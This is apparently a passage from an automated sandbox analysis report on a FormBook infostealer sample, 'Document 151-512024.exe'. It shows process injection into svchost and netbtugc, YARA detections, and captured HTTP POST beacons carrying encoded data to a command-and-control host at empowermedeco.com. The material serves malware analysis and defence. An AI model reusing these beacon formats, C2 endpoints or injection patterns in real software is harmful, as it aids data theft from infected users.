May 8, 2024 10:51:36.752791882 CEST	1289	IN	Data Raw: 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 65 2c 6f 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6 e7 bb Data Ascii: iduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt\|\|[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send(n)
May 8, 2024 10:51:36.752808094 CEST	210	IN	Data Raw: 2e 70 75 73 68 28 22 22 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 69 29 2c 22 3d 22 29 2e 63 6f 6e 63 61 74 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 5b 69 5d 29 29 29 3b 76 61 72 20 63 Data Ascii: .push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncps
May 8, 2024 10:51:36.755567074 CEST	1289	IN	Data Raw: 73 6e 74 6e 77 62 69 70 72 65 69 6d 65 75 74 73 76 22 29 3b 28 65 28 29 7c 7c 72 28 29 29 26 26 22 61 6e 64 72 6f 69 64 22 3d 3d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 Data Ascii: sntnwbipreimeutsv");(e()\|\|r())&&"android"===function(){var n=window.navigator.userAgent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)\|\|n.match(/ipad/i)\|\|n.match(/iphone/i)?"iphone":n.match(/android/i)\|\|n.match(/apad/i)?"android":
May 8, 2024 10:51:36.755585909 CEST	1289	IN	Data Raw: 29 2c 24 68 65 61 64 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 24 73 63 72 69 70 74 31 2c 24 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f Data Ascii: ),$head.insertBefore($script1,$head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.inser
May 8, 2024 10:51:36.755589962 CEST	95	IN	Data Raw: 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38 33 35 66 34 61 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c Data Ascii: mage.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.10	49748	217.196.55.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:43.627485991 CEST	776	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 50 51 59 6b 65 69 62 72 4b 66 65 4a 78 77 67 45 42 75 48 57 57 64 33 7a 48 6a 6f Data Ascii: FBEd=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuPQYkeibrKfeJxwgEBuHWWd3zHjo
May 8, 2024 10:51:43.833847046 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 08 May 2024 08:51:43 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.10	49749	217.196.55.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:46.361790895 CEST	800	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 42 35 39 42 57 43 58 4b 62 39 2b 4b 48 66 68 54 66 34 6d 45 6d 33 44 75 31 54 4f 67 3d 3d Data Ascii: FBEd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhB59BWCXKb9+KHfhTf4mEm3Du1TOg==
May 8, 2024 10:51:46.567851067 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 08 May 2024 08:51:46 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.10	49750	217.196.55.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:49.096772909 CEST	1813	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 77 48 44 6c 46 66 7a 5a 2f 49 66 64 6e 42 6a 6d 7a 51 33 57 4b 65 59 72 64 47 47 34 77 30 73 63 73 4b 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 56 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 56 [TRUNCATED] Data Ascii: FBEd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3NnwHDlFfzZ/IfdnBjmzQ3WKeYrdGG4w0scsKATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fV/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLvViXzLp0fW7PSxZJU4aI0Z4SPFCBx8ZQZWgNQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu95mqcFpNDCSj7UBc5W2NVu2TKkbgT8SvDXRlNMmMEB+LT5MQsmWzWkZ2xbmylKhMIHMdrbC9pMmmfpHhDCX66M6zzu6tIB7M111cAKylGWpy09w6HHGDk95Dk/DKinjKg9y4hkY9g0V/G1QCphA+nNI4+VS6gng4FvKQ6NMSB4fbVme9iuVLKjCxiAEwaeOxv4pDcSEcBd4DUSFaNuegAcIZvJQJYRpd1KAQ1g38x12CunvTPyzSOVBmnXfV3zJWeze2cQH1QSipUz0tZLRfNXuoO1nJV+ywXooox5/pMLCkx0Bh/pKCRuGM78lBposkFG3/PIWILBoeknnO/kP2v/JY8jI+pDOpkUf5uUCTMVNlXQuSJSNY2xp3bT0z7R6vtuZoPXkkhHqM5qVFT3iV9j4v5KR1m8KeEp+gl6DjXRQbiUx9JUCDLfI2bKlUI8HXKiFq+2rbeY2f2LA6GUvw13h8dEq46kTrPJ6r6RaK7rS1lN1L1720ATPaCD2h0GomESuVDixYobxrU9LbE [TRUNCATED]
May 8, 2024 10:51:49.303035021 CEST	1070	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 08 May 2024 08:51:49 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.10	49751	217.196.55.202	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:51.833359003 CEST	503	OUT	GET /fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:51:52.040632010 CEST	1205	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Wed, 08 May 2024 08:51:51 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?FBEd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZVFf0Y/DWu0uYrbCSDy6fTugJKp8nA==&4h8=YPQX8Tch platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Target ID:	0
Start time:	10:48:28
Start date:	08/05/2024
Path:	C:\Users\user\Desktop\Document 151-512024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Document 151-512024.exe"
Imagebase:	0x940000
File size:	1'246'208 bytes
MD5 hash:	8E009A43143D3AFDDE5E91B311E4018B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:48:29
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Document 151-512024.exe"
Imagebase:	0x1f0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1392971539.0000000003190000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1392632147.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1393386838.0000000004E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:48:36
Start date:	08/05/2024
Path:	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe"
Imagebase:	0xbe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.3690392371.0000000003620000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:48:38
Start date:	08/05/2024
Path:	C:\Windows\SysWOW64\netbtugc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\netbtugc.exe"
Imagebase:	0x3d0000
File size:	22'016 bytes
MD5 hash:	EE7BBA75B36D54F9E420EB6EE960D146
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3688668535.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3686290568.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.3688949432.0000000002EF0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:48:53
Start date:	08/05/2024
Path:	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe"
Imagebase:	0xbe0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	10:49:05
Start date:	08/05/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff613480000
File size:	676'768 bytes
